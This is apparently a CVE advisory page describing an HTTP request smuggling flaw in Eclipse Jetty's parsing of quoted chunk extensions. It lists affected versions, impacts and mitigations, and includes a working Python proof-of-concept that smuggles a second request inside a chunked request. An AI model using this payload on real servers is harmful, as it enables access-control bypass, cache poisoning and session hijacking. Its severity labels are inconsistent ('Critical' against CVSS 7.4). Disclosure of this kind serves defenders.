Eclipse Jetty, HTTP Request Smuggling, CVE-2026-2332 (Critical)

Listen to this Post

How CVE-2026-2332 Works

The vulnerability stems from a critical deviation in how Eclipse Jetty parses HTTP/1.1 chunked transfer encoding, specifically concerning quoted strings within chunk extensions. The core issue is that Jetty incorrectly interprets a `\r\n` (CRLF) sequence inside a quoted string as a termination point for the chunk header, rather than as a parsing error.
According to RFC 9112, a chunk extension value can be a quoted-string (chunk-ext-val = token / quoted-string). RFC 9110 mandates that a quoted-string continues until its closing double quote (DQUOTE) and that `\r\n` sequences are not permitted within it. An RFC-compliant parser should reject such a sequence as malformed. However, Jetty terminates the chunk header parsing at the first `\r\n` encountered inside the quotes, treating the remainder of the data as regular HTTP message body. This misinterpretation allows an attacker to create a single, malformed HTTP request that is parsed as two separate requests by the Jetty server. The smuggled request is hidden within what should have been a quoted chunk extension value, effectively bypassing any front-end security controls and poisoning the server’s interpretation of the request stream. The provided proof-of-concept demonstrates this by smuggling a `GET /smuggled` request past the server, resulting in two HTTP responses from a single TCP connection.
Platform: Eclipse Jetty
Version: 9.4.0 ≤ 9.4.59, 10.0.0 ≤ 10.0.27, 11.0.0 ≤ 11.0.27, 12.0.0 ≤ 12.0.32, 12.1.0 ≤ 12.1.6
Vulnerability: HTTP Request Smuggling (CWE-444)
Severity: High (CVSS 3.1: 7.4)
Date: 2026-04-14

Prediction: 2026-04-21

What Undercode Say:

Analytics on this vulnerability reveal a high-risk discrepancy in HTTP/1.1 parsing logic. The following commands and code snippets are provided for detection and validation:

Check your Jetty version against the list of vulnerable versions
java -jar jetty-start.jar --version
Use a Python script to test for the vulnerability
python3 smuggler.py

Proof-of-Concept (PoC) Code:

!/usr/bin/env python3
import socket
payload = (
b"POST / HTTP/1.1\r\n"
b"Host: localhost\r\n"
b"Transfer-Encoding: chunked\r\n"
b"\r\n"
b'1;a="\r\n'
b"X\r\n"
b"0\r\n"
b"\r\n"
b"GET /smuggled HTTP/1.1\r\n"
b"Host: localhost\r\n"
b"Content-Length: 11\r\n"
b"\r\n"
b'"\r\n'
b"Y\r\n"
b"0\r\n"
b"\r\n"
)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)
response = b""
while True:
try:
chunk = sock.recv(4096)
if not chunk:
break
response += chunk
except socket.timeout:
break
sock.close()
print(f"Responses: {response.count(b'HTTP/')}")
print(response.decode(errors="replace"))

Exploit:

An attacker can exploit this by sending a single malformed HTTP request with a crafted `Transfer-Encoding: chunked` header. The exploit creates a chunk extension that includes a `\r\n` inside a quoted string. For example: 1;a="\r\n. The vulnerable Jetty parser stops reading the chunk header at the \r\n, misinterpreting the rest of the data—which includes a second request (e.g., GET /smuggled HTTP/1.1)—as the body of the first request and subsequent pipelined requests. This leads to request smuggling, where the smuggled request is processed by the server without being inspected by any front-end reverse proxies or security appliances.

Protection from this CVE

Immediate Remediation: Upgrade to a patched version of Eclipse Jetty. As of the publication date, patches are expected to be available in versions 9.4.60+, 10.0.28+, 11.0.28+, 12.0.33+, and 12.1.7+.
Network-Level Mitigation: Deploy a Web Application Firewall (WAF) with rules to detect and block requests containing CRLF sequences (\r\n) within quoted strings in chunked transfer encoding headers.
Configuration: If immediate patching is impossible, disable HTTP/1.1 chunked transfer encoding support on the Jetty server and use HTTP/2 or HTTP/1.1 with `Content-Length` headers where feasible.

Impact

Successful exploitation of this vulnerability can lead to severe consequences:
Request Smuggling: An attacker can inject arbitrary HTTP requests, allowing them to bypass security controls and directly interact with backend applications.
Cache Poisoning: Smuggled responses can be used to poison shared web caches, delivering malicious content to other users.
Access Control Bypass: Smuggled requests can bypass frontend authentication and authorization mechanisms.
Session Hijacking: Attackers can steal or manipulate other users’ sessions by intercepting their responses.
Data Exfiltration: Sensitive data can be extracted from the server by crafting smuggled requests that access internal endpoints.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top